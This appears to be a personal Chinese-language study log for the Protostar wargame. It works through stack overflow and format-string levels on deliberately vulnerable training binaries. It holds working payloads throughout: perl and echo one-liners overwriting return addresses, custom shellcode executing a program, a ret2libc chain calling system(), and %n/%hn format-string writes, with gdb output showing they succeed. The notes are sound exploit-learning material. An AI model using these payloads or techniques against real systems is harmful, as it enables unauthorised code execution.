Protostar 学习笔记
正在学习二进制安全
更新并不定期
工作的环境配置如下
# /bin/bash
user@protostar:~$ su
root@protostar:/# echo '1' > /proc/sys/fs/suid_dumpable
root@protostar:/# exit
user@protostar:~$ gdb -q
(gdb) set disassemble-flavor
那么下面就是正文了
4/13/2015
Stack 系列
Level 0~2
都是相当简单的缓冲区溢出
这部分因为是中午要睡觉
export foo=`perl -e 'print "\x50\x9a\x05\x40"'`
Level 3
直接disas main
i fun
disas win
disas main
perl -e 'print "a"x64 . "\x24\x84\x04\x08"' | ./stack3
4/15/2015
Level 4
注意这里编译器生成的代码
and esp, 0xfffffff0
自己写了个调用
perl -e 'print "a"x76 . "\x24\x84\x04\x08"' | ./stack3
(76=64+0x08+0x04)
但是关于这个偏移量产生的原因
Level 5
i fun
disas
先来看下代码
push ebp
mov ebp, esp
and esp, 0xfffffff0
sub esp, 0x50
lea eax, [esp+0x10]
mov DWORD PTR [esp], eax
call <gets@plt>
leave
ret
那么压入栈中的返回地址是esp+(0x50-0x08+0x04=)76==esp+0x4c
esp+0x10
(本环境下
perl -e 'print "\xcc"x76 . "\xd0\xf7\xff\xbf"' > '~/test.in'
<Alt+F2>
(gdb) r
Starting program: /opt/protostar/bin/stack5 < ~/test.in
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff7d1 in ??()
(gdb) x /20x 0xbffff7d0
0xbffff7d0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
......
0xbffff810: 0xcccccccc 0xcccccccc 0xcccccccc 0xbffff7d0
(gdb) i reg esp ebp
esp 0xbffff820 0xbffff820
ebp 0xcccccccc 0xcccccccc
看来是没问题了
#base: 0xbffff7d0+0x1c 个 nop
#-1: 90 nop
#00: 31 c0 xor eax,eax
#02: a3 08 f8 ff bf mov ds:0xbffff808,eax
#07: b0 0b mov al,0xb
#09: bb 0c f8 ff bf mov ebx,0xbffff80c
#0e: b9 04 f8 ff bf mov ecx,0xbffff804
#13: 8b 15 08 f8 ff bf mov edx,DWORD PTR ds:0xbffff808
#19: cd 80 int 0x80
#0xbffff7fc: 0xbffff808 0x06198904
#0xbffff80c: /usr /bin /cal 0x00000000
#0xbffff81c: 0xbffff7d0 <----TARGET!
perl -e 'print "\x90" . "\x90"x24 . "\x31\xC0\xA3\x08\xF8\xFF\xBF\xB0\x0B\xBB\x0C\xF8\xFF\xBF\xB9\x04\xF8\xFF\xBF\x8B\x15\x08\xF8\xFF\xBF\xCD\x80" . "\x08\xf8\xff\xbf\x06\x19\x89\x04" . "/usr/bin/cal" . "\x00"x4 . "\xd0\xf7\xff\xbf"' > ~/test.in
先是把第一个
(gdb) r
Starting program: /opt/protostar/bin/stack5 < ~/test.in
Executing new program: /usr/bin/ncal
April 2015
Su 5 12 19 26
Mo 6 13 20 27
Tu 7 14 21 28
We 1 8 15 22 29
Th 2 9 16 23 30
Fr 3 10 17 24
Sa 4 11 18 25
Program exited normally.
似乎是因为并没有覆盖到目标之外的栈帧
4/27/2015
Level 6
getpath
void getpath(void)
{
//offset:0x08048484
//08048484 55 push ebp
//08048485 89 e5 mov ebp,esp
//08048487 83 ec 68 sub esp,0x68
//allocated 0x68 on stack
//0804848a b8 d0 85 04 08 mov eax,0x80485d0
//0804848f 89 04 24 mov DWORD PTR [esp],eax
//08048492 e8 29 ff ff ff call 0x080483c0 <printf@plt>
printf("input path please: "); //*0x080485d0=="input path please: "
//08048497 a1 20 97 04 08 mov eax,ds:0x8049720
//0804849c 89 04 24 mov DWORD PTR [esp],eax
//0804849f e8 0c ff ff ff call 0x080483b0 <fflush@plt>
fflush(stdout); //0x08049720==stdout
//080484a4 8d 45 b4 lea eax,[ebp-0x4c]
//080484a7 89 04 24 mov DWORD PTR [esp],eax
//080484aa e8 d1 fe ff ff call 0x08048380 <gets@plt>
gets(ebp-0x4c); //result stored in ebp-0x4c, aka. esp+0x1c
//080484af 8b 45 04 mov eax,DWORD PTR [ebp+0x4]
//080484b2 89 45 f4 mov DWORD PTR [ebp-0xc],eax
//080484b5 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]
//080484b8 25 00 00 00 bf and eax,0xbf000000
//080484bd 3d 00 00 00 bf cmp eax,0xbf000000
//080484c2 75 20 jne loc_080484e4
// these code checked the stack, and if return ptr is not
// modified, the program will jump to loc_080484e4,
// or will report an error.
// only when the execute code is in the stack, the system
// will work
//080484c4 b8 e4 85 04 08 mov eax,0x80485e4
//080484c9 8b 55 f4 mov edx,DWORD PTR [ebp-0xc]
//080484cc 89 54 24 04 mov DWORD PTR [esp+0x4],edx
//080484d0 89 04 24 mov DWORD PTR [esp],eax
//080484d3 e8 e8 fe ff ff call 0x080483c0 <printf@plt>
printf("bzzzt (%p)\n", *(ebp+0x4)); //show the ret addr
//080484d8 c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1
//080484df e8 bc fe ff ff call 0x080483a0
exit(1);
// loc_080484e4:
//080484e4 b8 f0 85 04 08 mov eax,0x80485f0
//080484e9 8d 55 b4 lea edx,[ebp-0x4c]
//080484ec 89 54 24 04 mov DWORD PTR [esp+0x4],edx
//080484f0 89 04 24 mov DWORD PTR [esp],eax
//080484f3 e8 c8 fe ff ff call 0x080483c0 <printf@plt>
printf("got path %s\n", ebp-0x4c);
//080484f8 c9 leave
//080484f9 c3 ret
}
/*
0
| [esp=org_addr] ....
| ....
| [esp+0x1c] char input[0x40]
| ...
| [esp+0x5c] void* v1
| ...
| [ebp=esp+0x68] OLD EBP == 0xbffff818
| [esp+0x6c] RETURN ADDR == 0x08048505
V
F
*/
自带保护
(gdb) i func system
...
File ../sysdeps/posix/system.c:
int __libc_system(const char *);
static int do_system(const char *);
(gdb) p system
$2 = {...} 0xb7ecffb0 <__libc_system>
果然有东西
int main(void)
{
//...
system("whoami");
//...
return 0;
}
源程序虽然检查了返回地址
user@protostar:/opt/protostar/bin$ perl -e 'print "\xbf\x67\x68\x69"x20 . "\xbf\xbf\xbf\xbf"' | ./stack6
input path please: bzzzt (0xbfbfbfbf)
少一组就不好用
#</usr/bin/whoami>.<fillings(and here is end)>.<0xb7ecffb0>.<0xb7ec60c0>.<0xbffff7fc>.<0x04198906>
user@protostar:/opt/protostar/bin$ perl -e 'print "/usr/bin/whoami;#" . "F"x63 . "\xb0\xff\xec\xb7" . "\xc0\x60\xec\xb7" . "\xfc\xf7\xff\xbf" . "\x06\x89\x19\x04"' | ./stack6
解释下
|FFFFFFFF|------------------>|00000000|
|ret addr| param 1 | param 2 |........|
调用system()
exit()
exit()
0xbffff7fc
之后回头看了下
Level 7
目前并没做出来
4/29/2015
但是
走到死路口之前先不写这种方法的
4/30/2015
Format[0..4]
这组练习均是有关于格式化字符串漏洞的
总体上看
这种情况下
Format 0
程序逻辑是
./format0 `python -c 'print "%64d\xef\xbe\xad\xde"'`
Format 1
程序读入启动参数并展示
for i in {1..300}; do ./format1 `echo -ne "\x38\x96\x04\x08%$i\\$x"`; echo; done | nl | grep 9638
127 88049638
构造
user@protostar:/opt/protostar/bin$ ./format1 `echo -ne '\x38\x96\x04\x08%127$n'`
8you have modified the target :)
不同机器上
Format 2
这次我们要控制改写的值为
user@protostar:/opt/protostar/bin$ echo -ne "\xe4\x96\x04\x08%060x%4\$n\n" | ./format2
鋿 000000000000000000000000000000000000000000000000000000000200
you have modified the target :)
Format 3
为了写入
echo -ne "\xf4\x96\x04\x08%16930112c%12\$n" | ./format3
但是
echo -ne "\xf6\x96\x04\x08\xf4\x96\x04\x08%21820c%13\$hn%43966c%12\$hn" | ./format3
echo -ne "\xf6\x96\x04\x08\xf4\x96\x04\x08%250c%12\$hn%21570c%13\$hn" | ./format3
这里我们使用%hn
0x1025544 = 0x0102 << 16 + 0x5544
0x0102 = 258; 258 - 8 = 250
0x5544 - 0x0102 = 21570
Y = 0x218-0x208 = 0x10
X = +0x18 + 0x4 = 0x1C
(X+Y)/4+1 = 12 //indicates the first one to extract
Format 4
为了让程序在
echo -ne "\x25\x97\x04\x08\x24\x97\x04\x08%033964c%5\$n%0491472c%4\$n\n" | ./format4
但其实
echo -ne "\x24\x97\x04\x08%33968u%4\$hn" | ./format4
....
code execution redirected! you win
注意